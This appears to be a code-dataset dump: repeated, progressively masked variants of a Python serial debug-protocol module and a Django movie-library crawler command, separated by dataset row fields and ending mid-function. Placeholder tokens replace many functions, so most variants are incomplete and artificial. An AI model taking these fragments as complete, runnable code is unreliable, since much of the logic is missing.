"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,819 | 99bdc5db120de0f0658cb37ed46bf3df2f1e77f2 | import os
import json
import datetime
import re
import asyncio
import aiohttp
from urllib.request import urlopen
from urllib.parse import urlencode
from django.core.handlers.base import sync_to_async
from django.core.management.base import BaseCommand
from application.models import Movie, NewMovieNotification, MovieDirectory
from django.conf import settings
from django.utils import timezone
from application.resolvers import ResolverSet
MOVIES_EXT = [
'.mp4',
'.mkv',
'.avi',
'.flv',
'.mov',
'.webm',
]
class Report:
def __init__(self):
self.fail = 0
self.success = 0
self.poster = 0
self.start_time = None
def start(self):
Report.start_time = datetime.datetime.now()
def display(self):
total_time = datetime.datetime.now() - Report.start_time
total = self.fail + self.success
if not total:
print("You media directory ({}) does not contain any new film.".format(list(MovieDirectory.objects.all())))
return
print("")
print("Crawler report")
print("===============")
print("")
print("Success {:>5} ({:>6.2f}%)".format(self.success, self.success/total*100))
print("Posters {:>5} ({:>6.2f}%)".format(self.poster, self.poster/total*100))
print("Fails {:>5} ({:>6.2f}%)".format(self.fail, self.fail/total*100))
print("")
print("Total {:>5}".format(total))
print("Time {}".format(total_time))
class Crawler:
def __init__(self, cmd, loop, aiohttp_session, report):
self.command = cmd
self.loop = loop
self.aiohttp_session = aiohttp_session
self.report = report
self.movies = {m.path: m for m in Movie.objects.all()}
self.resolver_set = ResolverSet(loop, aiohttp_session)
def queue_update_tasks(self, movie_directory, tasks):
path = movie_directory.path
for dirname, subdirs, files in os.walk(path):
for filename in files:
name, ext = os.path.splitext(filename)
path = os.path.join(dirname, filename)
if ext not in MOVIES_EXT:
self.message(self.command.style.WARNING("UNSUPPORTED EXTENSION %s" % ext), path)
continue
statinfo = os.stat(path)
if statinfo.st_size < 256 * 2**20: # size < 256MB
continue
self.message(self.command.style.WARNING("SAMPLE"), path)
tasks.append(asyncio.ensure_future(self.handle_file(name, path)))
def message(self, tag, message):
try:
self.command.stdout.write("[ {:^40} ] {}".format(tag, message))
except UnicodeEncodeError:
pass
async def handle_file(self, name, path):
if path in self.movies.keys():
if not settings.ALLOW_DB_UPDATE:
return
# update old movies data.
movie = self.movies[path]
update = True
else:
movie = Movie()
update = False
movie = await self.resolver_set.resolve(path, movie)
if not movie.poster:
self.message(self.command.style.NOTICE('NO POSTER'), path)
else:
self.report.poster += 1
self.report.success += 1
movie.path = path
await sync_to_async(movie.save)()
if not update:
await sync_to_async(NewMovieNotification.notify_all)(movie)
self.symlink(path)
self.message(self.command.style.SUCCESS("ADDED"), "%s as %s" % (path, movie.title))
else:
self.message(self.command.style.SUCCESS("UPDATED"), "%s as %s" % (path, movie.title))
def symlink(self, path):
destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.basename(path))
if os.path.islink(destination):
os.remove(destination)
os.symlink(path, destination)
class Command(BaseCommand):
help = "Update local movie list"
def handle(self, *args, **options):
report = Report()
report.start()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT, force_close=True, loop=loop)
aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)
tasks = []
crawler = Crawler(self, loop, aiohttp_session, report)
for directory in MovieDirectory.objects.all():
crawler.queue_update_tasks(directory, tasks)
if tasks:
loop.run_until_complete(asyncio.wait(tasks))
loop.run_until_complete(aiohttp_session.close())
loop.close()
# Delete movies with no path. Those entries are made possible since
# movies can be saved in the resolvers.
Movie.objects.filter(path="").delete()
report.display()
| [
"import os\nimport json\nimport datetime\nimport re\nimport asyncio\nimport aiohttp\nfrom urllib.request import urlopen\nfrom urllib.parse import urlencode\nfrom django.core.handlers.base import sync_to_async\nfrom django.core.management.base import BaseCommand\nfrom application.models import Movie, NewMovieNotification, MovieDirectory\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom application.resolvers import ResolverSet\n\nMOVIES_EXT = [\n '.mp4',\n '.mkv',\n '.avi',\n '.flv',\n '.mov',\n '.webm',\n]\n\n\nclass Report:\n def __init__(self):\n self.fail = 0\n self.success = 0\n self.poster = 0\n self.start_time = None\n\n def start(self):\n Report.start_time = datetime.datetime.now()\n\n\n def display(self):\n total_time = datetime.datetime.now() - Report.start_time\n total = self.fail + self.success\n if not total:\n print(\"You media directory ({}) does not contain any new film.\".format(list(MovieDirectory.objects.all())))\n return\n print(\"\")\n print(\"Crawler report\")\n print(\"===============\")\n\n print(\"\")\n print(\"Success {:>5} ({:>6.2f}%)\".format(self.success, self.success/total*100))\n print(\"Posters {:>5} ({:>6.2f}%)\".format(self.poster, self.poster/total*100))\n print(\"Fails {:>5} ({:>6.2f}%)\".format(self.fail, self.fail/total*100))\n\n print(\"\")\n print(\"Total {:>5}\".format(total))\n print(\"Time {}\".format(total_time))\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\"UNSUPPORTED EXTENSION %s\" % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2**20: # size < 256MB\n continue\n self.message(self.command.style.WARNING(\"SAMPLE\"), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name, path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write(\"[ {:^40} ] {}\".format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n # update old movies data.\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n\n movie = await self.resolver_set.resolve(path, movie)\n\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n\n self.report.success += 1\n movie.path = path\n\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS(\"ADDED\"), \"%s as %s\" % (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS(\"UPDATED\"), \"%s as %s\" % (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = \"Update local movie list\"\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT, force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n\n crawler = Crawler(self, loop, aiohttp_session, report)\n\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n\n # Delete movies with no path. Those entries are made possible since\n # movies can be saved in the resolvers.\n Movie.objects.filter(path=\"\").delete()\n\n report.display()\n",
"import os\nimport json\nimport datetime\nimport re\nimport asyncio\nimport aiohttp\nfrom urllib.request import urlopen\nfrom urllib.parse import urlencode\nfrom django.core.handlers.base import sync_to_async\nfrom django.core.management.base import BaseCommand\nfrom application.models import Movie, NewMovieNotification, MovieDirectory\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom application.resolvers import ResolverSet\nMOVIES_EXT = ['.mp4', '.mkv', '.avi', '.flv', '.mov', '.webm']\n\n\nclass Report:\n\n def __init__(self):\n self.fail = 0\n self.success = 0\n self.poster = 0\n self.start_time = None\n\n def start(self):\n Report.start_time = datetime.datetime.now()\n\n def display(self):\n total_time = datetime.datetime.now() - Report.start_time\n total = self.fail + self.success\n if not total:\n print('You media directory ({}) does not contain any new film.'\n .format(list(MovieDirectory.objects.all())))\n return\n print('')\n print('Crawler report')\n print('===============')\n print('')\n print('Success {:>5} ({:>6.2f}%)'.format(self.success, self.success /\n total * 100))\n print('Posters {:>5} ({:>6.2f}%)'.format(self.poster, self.poster /\n total * 100))\n print('Fails {:>5} ({:>6.2f}%)'.format(self.fail, self.fail /\n total * 100))\n print('')\n print('Total {:>5}'.format(total))\n print('Time {}'.format(total_time))\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\nMOVIES_EXT = ['.mp4', '.mkv', '.avi', '.flv', '.mov', '.webm']\n\n\nclass Report:\n\n def __init__(self):\n self.fail = 0\n self.success = 0\n self.poster = 0\n self.start_time = None\n\n def start(self):\n Report.start_time = datetime.datetime.now()\n\n def display(self):\n total_time = datetime.datetime.now() - Report.start_time\n total = self.fail + self.success\n if not total:\n print('You media directory ({}) does not contain any new film.'\n .format(list(MovieDirectory.objects.all())))\n return\n print('')\n print('Crawler report')\n print('===============')\n print('')\n print('Success {:>5} ({:>6.2f}%)'.format(self.success, self.success /\n total * 100))\n print('Posters {:>5} ({:>6.2f}%)'.format(self.poster, self.poster /\n total * 100))\n print('Fails {:>5} ({:>6.2f}%)'.format(self.fail, self.fail /\n total * 100))\n print('')\n print('Total {:>5}'.format(total))\n print('Time {}'.format(total_time))\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n\n\nclass Report:\n\n def __init__(self):\n self.fail = 0\n self.success = 0\n self.poster = 0\n self.start_time = None\n\n def start(self):\n Report.start_time = datetime.datetime.now()\n\n def display(self):\n total_time = datetime.datetime.now() - Report.start_time\n total = self.fail + self.success\n if not total:\n print('You media directory ({}) does not contain any new film.'\n .format(list(MovieDirectory.objects.all())))\n return\n print('')\n print('Crawler report')\n print('===============')\n print('')\n print('Success {:>5} ({:>6.2f}%)'.format(self.success, self.success /\n total * 100))\n print('Posters {:>5} ({:>6.2f}%)'.format(self.poster, self.poster /\n total * 100))\n print('Fails {:>5} ({:>6.2f}%)'.format(self.fail, self.fail /\n total * 100))\n print('')\n print('Total {:>5}'.format(total))\n print('Time {}'.format(total_time))\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n\n\nclass Report:\n\n def __init__(self):\n self.fail = 0\n self.success = 0\n self.poster = 0\n self.start_time = None\n\n def start(self):\n Report.start_time = datetime.datetime.now()\n <function token>\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n\n\nclass Report:\n\n def __init__(self):\n self.fail = 0\n self.success = 0\n self.poster = 0\n self.start_time = None\n <function token>\n <function token>\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n 